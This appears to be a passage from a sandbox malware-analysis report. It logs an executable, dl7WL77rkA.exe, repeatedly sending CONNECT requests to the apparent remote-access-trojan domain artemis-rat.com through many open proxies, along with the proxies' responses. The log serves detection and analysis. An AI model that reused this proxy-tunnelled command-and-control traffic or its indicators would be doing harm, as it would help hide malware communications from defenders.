                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421829939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.076714993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.998929977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905143976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.067447901 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            482192.168.2.55135527.96.235.171803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421902895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.723462105 CET326INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            483192.168.2.55144038.162.9.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421905994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.873076916 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            484192.168.2.55126083.219.145.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.422621012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.837191105 CET202INHTTP/1.0 403 Forbidden
                                                                                                                                                                                                                                                            Content-Length: 711
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            485192.168.2.551198112.109.16.5180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.424886942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            486192.168.2.55134951.255.20.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.427745104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.765221119 CET | 803 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 11 Mar 2024 02:31:06 GMT
Vary: Accept-Encoding
Content-Length: 620
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, [no address given] and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.2.16 (Debian) Server at artemis-rat.com Port 443</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
487192.168.2.55136460.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.429183006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
488192.168.2.551460162.214.225.223434353876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.430577040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.967328072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.639256954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.996361971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.695261002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.424063921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
489192.168.2.55137120.205.61.14381233876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.450647116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.802757978 CET | 319 | IN | HTTP/1.1 403 Forbidden
Server: squid
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from cdn-fintech.info
X-Cache-Lookup: NONE from cdn-fintech.info:8123
Connection: keep-alive
Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
Data Ascii: ERR_ACCESS_DENIED


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
490192.168.2.55135452.67.10.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.450649023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.826700926 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0
Mar 11, 2024 03:30:39.972587109 CET | 177 | OUT | Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce a8 9e e0 18 01 1c f7 71 80 06 21 ff 17 dc ce a5 ca d4 64 ef e3 a7 ce 53 66 f0 30 18 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
Data Ascii: elq!dSf0*,+0/$#('=<5/Uartemis-rat.com#
Mar 11, 2024 03:30:40.296207905 CET | 1079 | IN | Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 61 3a a3 f9 16 f1 05 05 78 3a 28 2a f4 9c c1 0d 63 48 82 eb 2c cd 73 45 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
Data Ascii: =9a:x:(*cH,sEDOWNGRD0000*H010Uartemis-rat.com0240311015326Z260311015326Z010Uartemis-rat.com0"0*H0RS
Mar 11, 2024 03:30:40.313513041 CET | 93 | OUT | Data Raw: 16 03 03 00 25 10 00 00 21 20 0e dc 77 c6 bd 63 14 b4 b5 96 d1 f6 f5 5e ab 15 4a 9a b7 2f f2 87 39 de f7 e3 2c 9a fa 77 a8 47 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5f a0 1f 90 71 aa ae b4 f4 0e 02 a3 37 a1 18 a0 82 ca 56 ab 41
Data Ascii: %! wc^J/9,wG(_q7VAdqo$r
Mar 11, 2024 03:30:40.633948088 CET | 51 | IN | Data Raw: 14 03 03 00 01 01 16 03 03 00 28 29 57 d9 c2 20 f9 87 7f 1c c3 27 cd b1 c9 33 61 37 c3 00 5c 5f e9 8a 5a 60 d9 a9 cb de a2 cb c1 1e ac 04 a3 fb 3e 46 81
Data Ascii: ()W '3a7\_Z`>F


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
491192.168.2.55130845.11.95.16660023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.451158047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.975069046 CET | 39 | IN | HTTP/1.0 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
492192.168.2.551536104.16.207.86803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.451714993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.613049030 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            493192.168.2.551304190.103.177.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.452482939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.848870039 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            494192.168.2.550358103.155.54.26833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.463140965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498764992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.126585007 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            495192.168.2.55042745.81.232.17543933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.472738981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.514400005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608470917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701935053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.714030981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            496192.168.2.551699202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.473865032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            497192.168.2.551701202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.475184917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            498192.168.2.551346203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.475188017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            499192.168.2.551702202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.477051020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            500192.168.2.551365176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.477087021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            501192.168.2.551703202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.478712082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
502192.168.2.55140147.243.205.131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.484585047 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
503192.168.2.55172446.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.488595963 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
504192.168.2.550487165.227.196.37567553876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.488977909 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
505192.168.2.55172546.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.490430117 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
506192.168.2.55172746.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.492278099 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
507192.168.2.5514185.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.493530035 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
508192.168.2.55172946.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.493813992 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
509192.168.2.55173647.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.497927904 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
510192.168.2.55173847.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.500246048 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


